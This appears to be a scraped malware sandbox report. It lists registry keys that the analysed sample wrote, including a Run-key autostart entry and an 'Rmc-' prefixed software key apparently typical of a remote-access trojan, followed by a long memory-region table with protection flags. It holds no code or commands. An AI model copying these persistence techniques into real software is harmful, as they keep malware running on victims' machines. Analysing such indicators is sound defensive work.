ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Wabbles
|
Erende29
|
||
|
HKEY_CURRENT_USER\Environment
|
Trkkerdrengens
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Naergaaende
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8DB0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5F50000
|
trusted library allocation
|
page read and write
|
|
|
|
C9DD000
|
direct allocation
|
page execute and read and write
|
|
|
|
1C46BE7E000
|
trusted library allocation
|
page read and write
|
|
|
|
2511C000
|
heap
|
page read and write
|
|
|
|
1784FD19000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
72E5000
|
heap
|
page execute and read and write
|
||
|
256C8000
|
heap
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1784FCF8000
|
heap
|
page read and write
|
||
|
B5DD000
|
direct allocation
|
page execute and read and write
|
||
|
17851A6A000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
256C2000
|
heap
|
page read and write
|
||
|
1C45A450000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
379F000
|
stack
|
page read and write
|
||
|
7FFB22682000
|
unkown
|
page readonly
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
5298EFF000
|
stack
|
page read and write
|
||
|
1784FBD0000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
1784FCC7000
|
heap
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
1C45C038000
|
trusted library allocation
|
page read and write
|
||
|
1784FCFB000
|
heap
|
page read and write
|
||
|
5E25000
|
trusted library allocation
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
876C000
|
heap
|
page read and write
|
||
|
1C45A3C0000
|
heap
|
page read and write
|
||
|
3394000
|
trusted library allocation
|
page read and write
|
||
|
1784FCF8000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
17851A6E000
|
heap
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
7D5097E000
|
stack
|
page read and write
|
||
|
25DC000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
17851AA0000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
97DD000
|
direct allocation
|
page execute and read and write
|
||
|
7D518CE000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
7D50D7E000
|
stack
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
7B47000
|
trusted library allocation
|
page read and write
|
||
|
88F7000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
1784FCCD000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
24721000
|
heap
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
7B8E000
|
stack
|
page read and write
|
||
|
88B5000
|
heap
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
1784FBE0000
|
heap
|
page read and write
|
||
|
7998000
|
trusted library allocation
|
page read and write
|
||
|
250B1000
|
heap
|
page read and write
|
||
|
34AC000
|
heap
|
page read and write
|
||
|
5F4B000
|
trusted library allocation
|
page read and write
|
||
|
24FC4000
|
heap
|
page read and write
|
||
|
1784FCEA000
|
heap
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
512D000
|
heap
|
page read and write
|
||
|
7FFAAC284000
|
trusted library allocation
|
page read and write
|
||
|
3590000
|
trusted library allocation
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
251B9000
|
heap
|
page read and write
|
||
|
24621000
|
heap
|
page read and write
|
||
|
17851AA0000
|
heap
|
page read and write
|
||
|
1784FC90000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
1784FC37000
|
heap
|
page read and write
|
||
|
776E000
|
stack
|
page read and write
|
||
|
875C000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
877B000
|
heap
|
page read and write
|
||
|
1784FCCC000
|
heap
|
page read and write
|
||
|
5129000
|
heap
|
page read and write
|
||
|
701D0000
|
unkown
|
page readonly
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
889B000
|
heap
|
page read and write
|
||
|
4C37000
|
heap
|
page read and write
|
||
|
8759000
|
heap
|
page read and write
|
||
|
8E10000
|
direct allocation
|
page read and write
|
||
|
2FBD000
|
stack
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
7D51A4B000
|
stack
|
page read and write
|
||
|
1C45C282000
|
trusted library allocation
|
page read and write
|
||
|
335F000
|
stack
|
page read and write
|
||
|
2E7C000
|
heap
|
page read and write
|
||
|
7FFAAC431000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22680000
|
unkown
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
3508000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page readonly
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
256C4000
|
heap
|
page read and write
|
||
|
556C000
|
trusted library allocation
|
page read and write
|
||
|
5122000
|
heap
|
page read and write
|
||
|
1C45C5C7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22660000
|
unkown
|
page readonly
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
87AE000
|
stack
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7D50DFE000
|
stack
|
page read and write
|
||
|
1C4742AB000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C474390000
|
heap
|
page execute and read and write
|
||
|
1C474397000
|
heap
|
page execute and read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
25144000
|
heap
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
1C45C632000
|
trusted library allocation
|
page read and write
|
||
|
1C45DCCF000
|
trusted library allocation
|
page read and write
|
||
|
33CD000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
5145000
|
heap
|
page read and write
|
||
|
8DE0000
|
direct allocation
|
page read and write
|
||
|
7470000
|
direct allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
701E6000
|
unkown
|
page readonly
|
||
|
1791BFF000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
17851A76000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
17851A7E000
|
heap
|
page read and write
|
||
|
306F000
|
unkown
|
page read and write
|
||
|
7D50EFB000
|
stack
|
page read and write
|
||
|
8E20000
|
direct allocation
|
page read and write
|
||
|
1C4748A0000
|
heap
|
page read and write
|
||
|
7FFAAC290000
|
trusted library allocation
|
page read and write
|
||
|
8D90000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
5DE9000
|
trusted library allocation
|
page read and write
|
||
|
5121000
|
heap
|
page read and write
|
||
|
78D2000
|
heap
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
7FFB22685000
|
unkown
|
page readonly
|
||
|
34C2000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
4C0E000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C45C61D000
|
trusted library allocation
|
page read and write
|
||
|
7783000
|
heap
|
page read and write
|
||
|
7FFB22682000
|
unkown
|
page readonly
|
||
|
512A000
|
heap
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
1C474596000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
1C45A360000
|
heap
|
page read and write
|
||
|
4970000
|
heap
|
page read and write
|
||
|
1D923960000
|
heap
|
page read and write
|
||
|
35EE000
|
stack
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
1784FE8C000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
515F000
|
heap
|
page read and write
|
||
|
24721000
|
heap
|
page read and write
|
||
|
1784FCFC000
|
heap
|
page read and write
|
||
|
256C6000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C474560000
|
heap
|
page read and write
|
||
|
1C45BE11000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C474354000
|
heap
|
page read and write
|
||
|
88B9000
|
heap
|
page read and write
|
||
|
1C45C644000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
heap
|
page read and write
|
||
|
7FFB22685000
|
unkown
|
page readonly
|
||
|
5145000
|
heap
|
page read and write
|
||
|
25BD3000
|
heap
|
page read and write
|
||
|
335C000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2BEC000
|
stack
|
page read and write
|
||
|
1C45A420000
|
trusted library allocation
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
17851A61000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
17851AA0000
|
heap
|
page read and write
|
||
|
316F000
|
stack
|
page read and write
|
||
|
1D923740000
|
heap
|
page read and write
|
||
|
17851A7E000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7890000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
7D50A7E000
|
stack
|
page read and write
|
||
|
1C45DBBE000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
34E0000
|
trusted library allocation
|
page read and write
|
||
|
1C45C605000
|
trusted library allocation
|
page read and write
|
||
|
BFDD000
|
direct allocation
|
page execute and read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
5160000
|
heap
|
page read and write
|
||
|
34C5000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
1C474328000
|
heap
|
page read and write
|
||
|
7D50673000
|
stack
|
page read and write
|
||
|
2E0E000
|
unkown
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
17851A68000
|
heap
|
page read and write
|
||
|
3393000
|
trusted library allocation
|
page execute and read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
17913FE000
|
stack
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
5021000
|
heap
|
page read and write
|
||
|
562C000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
1C4745F1000
|
heap
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1C45D044000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
701ED000
|
unkown
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
17851A73000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
25BD4000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C45A4B0000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
3530000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E32000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
4C1A000
|
heap
|
page read and write
|
||
|
32EE000
|
stack
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
52AF000
|
stack
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C45A5C0000
|
trusted library allocation
|
page read and write
|
||
|
1C46BE1F000
|
trusted library allocation
|
page read and write
|
||
|
87D0000
|
heap
|
page read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
3496000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
17851D00000
|
heap
|
page read and write
|
||
|
251BE000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
7420000
|
direct allocation
|
page read and write
|
||
|
5121000
|
heap
|
page read and write
|
||
|
8C9E000
|
stack
|
page read and write
|
||
|
3378000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
3437000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
1C45A4AC000
|
heap
|
page read and write
|
||
|
8D1E000
|
stack
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
887A000
|
heap
|
page read and write
|
||
|
1784FD16000
|
heap
|
page read and write
|
||
|
24AA5000
|
heap
|
page read and write
|
||
|
7FFAAC43A000
|
trusted library allocation
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
2511C000
|
heap
|
page read and write
|
||
|
32AE000
|
unkown
|
page read and write
|
||
|
8D5D000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
5020000
|
heap
|
page read and write
|
||
|
17916FE000
|
stack
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
3370000
|
trusted library section
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
7D5077E000
|
stack
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
1784FCF5000
|
heap
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
3439000
|
heap
|
page read and write
|
||
|
1784FCF3000
|
heap
|
page read and write
|
||
|
33F3000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
33A9000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
17917FF000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7788000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
7CF0000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
87B0000
|
heap
|
page read and write
|
||
|
1784FCF4000
|
heap
|
page read and write
|
||
|
8860000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
772E000
|
stack
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
72E0000
|
heap
|
page execute and read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
24721000
|
heap
|
page read and write
|
||
|
3890000
|
heap
|
page read and write
|
||
|
17851D12000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
1D923AB5000
|
heap
|
page read and write
|
||
|
1784FE8C000
|
heap
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
306C000
|
stack
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
ABDD000
|
direct allocation
|
page execute and read and write
|
||
|
4971000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
8DF0000
|
direct allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
7FFB22660000
|
unkown
|
page readonly
|
||
|
30ED000
|
stack
|
page read and write
|
||
|
369F000
|
unkown
|
page read and write
|
||
|
8DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5127000
|
heap
|
page read and write
|
||
|
250B1000
|
heap
|
page read and write
|
||
|
1784FCCA000
|
heap
|
page read and write
|
||
|
2515E000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
1C45A440000
|
heap
|
page execute and read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4C0E000
|
heap
|
page read and write
|
||
|
1D92379B000
|
heap
|
page read and write
|
||
|
5121000
|
heap
|
page read and write
|
||
|
3360000
|
trusted library section
|
page read and write
|
||
|
2D5F000
|
stack
|
page read and write
|
||
|
1784FC5C000
|
heap
|
page read and write
|
||
|
2E4E000
|
stack
|
page read and write
|
||
|
452E000
|
stack
|
page read and write
|
||
|
4C29000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
30A8000
|
stack
|
page read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
|
8D60000
|
trusted library allocation
|
page read and write
|
||
|
875C000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
1784FE10000
|
heap
|
page read and write
|
||
|
1C474482000
|
heap
|
page read and write
|
||
|
7D508FC000
|
stack
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
8B35000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
DDDD000
|
direct allocation
|
page execute and read and write
|
||
|
2515E000
|
heap
|
page read and write
|
||
|
512A000
|
heap
|
page read and write
|
||
|
1C45C446000
|
trusted library allocation
|
page read and write
|
||
|
5298CFD000
|
stack
|
page read and write
|
||
|
1784FCFA000
|
heap
|
page read and write
|
||
|
88AD000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
17851A6B000
|
heap
|
page read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
4C1A000
|
heap
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
727E000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1C47434F000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7DF4F6B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C45A665000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C474618000
|
heap
|
page read and write
|
||
|
17851A7B000
|
heap
|
page read and write
|
||
|
7FFAAC366000
|
trusted library allocation
|
page execute and read and write
|
||
|
7460000
|
direct allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
8785000
|
heap
|
page read and write
|
||
|
1C46BE31000
|
trusted library allocation
|
page read and write
|
||
|
1784FC84000
|
heap
|
page read and write
|
||
|
1C45DBC4000
|
trusted library allocation
|
page read and write
|
||
|
1784FE85000
|
heap
|
page read and write
|
||
|
7F6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8720000
|
trusted library allocation
|
page execute and read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
1784FCD1000
|
heap
|
page read and write
|
||
|
1C47460A000
|
heap
|
page read and write
|
||
|
3380000
|
trusted library allocation
|
page read and write
|
||
|
1784FCDB000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
5DC1000
|
trusted library allocation
|
page read and write
|
||
|
254D4000
|
heap
|
page read and write
|
||
|
17919FD000
|
stack
|
page read and write
|
||
|
1C45C4CA000
|
trusted library allocation
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
35A8000
|
heap
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
24FB1000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
|
17851A61000
|
heap
|
page read and write
|
||
|
1784FE8A000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
875C000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
296D000
|
stack
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
1791AFE000
|
stack
|
page read and write
|
||
|
5139000
|
heap
|
page read and write
|
||
|
250B1000
|
heap
|
page read and write
|
||
|
17912FA000
|
stack
|
page read and write
|
||
|
5021000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
1784FCA4000
|
heap
|
page read and write
|
||
|
34F0000
|
heap
|
page readonly
|
||
|
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
1C45C5E0000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
4C1B000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
1C46C0F9000
|
trusted library allocation
|
page read and write
|
||
|
876B000
|
heap
|
page read and write
|
||
|
338D000
|
heap
|
page read and write
|
||
|
88DF000
|
heap
|
page read and write
|
||
|
7FFAAC29B000
|
trusted library allocation
|
page read and write
|
||
|
513F000
|
heap
|
page read and write
|
||
|
6DFC000
|
stack
|
page read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
|
29E8000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
8C5B000
|
stack
|
page read and write
|
||
|
17851AA0000
|
heap
|
page read and write
|
||
|
1C47459B000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
1C45A280000
|
heap
|
page read and write
|
||
|
5125000
|
heap
|
page read and write
|
||
|
32D9000
|
heap
|
page read and write
|
||
|
251B8000
|
heap
|
page read and write
|
||
|
25144000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
792A000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C45A4F3000
|
heap
|
page read and write
|
||
|
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
876B000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
1784FE88000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
1C4745A2000
|
heap
|
page read and write
|
||
|
4C16000
|
heap
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
251BB000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page execute and read and write
|
||
|
251B2000
|
heap
|
page read and write
|
||
|
1784FCD4000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
334F000
|
stack
|
page read and write
|
||
|
1784FC6F000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
D3DD000
|
direct allocation
|
page execute and read and write
|
||
|
24627000
|
heap
|
page read and write
|
||
|
1D923AB4000
|
heap
|
page read and write
|
||
|
1784FC5B000
|
heap
|
page read and write
|
||
|
1791CFB000
|
stack
|
page read and write
|
||
|
7FFB22661000
|
unkown
|
page execute read
|
||
|
4E23000
|
trusted library allocation
|
page read and write
|
||
|
17851A6A000
|
heap
|
page read and write
|
||
|
250B1000
|
heap
|
page read and write
|
||
|
514E000
|
heap
|
page read and write
|
||
|
7FFB22680000
|
unkown
|
page read and write
|
||
|
250B1000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
1C474260000
|
heap
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1784FCFB000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
17851A60000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
1C45A380000
|
heap
|
page read and write
|
||
|
251BE000
|
heap
|
page read and write
|
||
|
5121000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
2518B000
|
heap
|
page read and write
|
||
|
7FFAAC282000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
2E34000
|
stack
|
page read and write
|
||
|
1C46C107000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D923750000
|
heap
|
page read and write
|
||
|
553A000
|
trusted library allocation
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
3520000
|
heap
|
page execute and read and write
|
||
|
877F000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D923AB0000
|
heap
|
page read and write
|
||
|
7D509FE000
|
stack
|
page read and write
|
||
|
277D000
|
stack
|
page read and write
|
||
|
1784FCC7000
|
heap
|
page read and write
|
||
|
3360000
|
trusted library allocation
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
1C473E10000
|
heap
|
page read and write
|
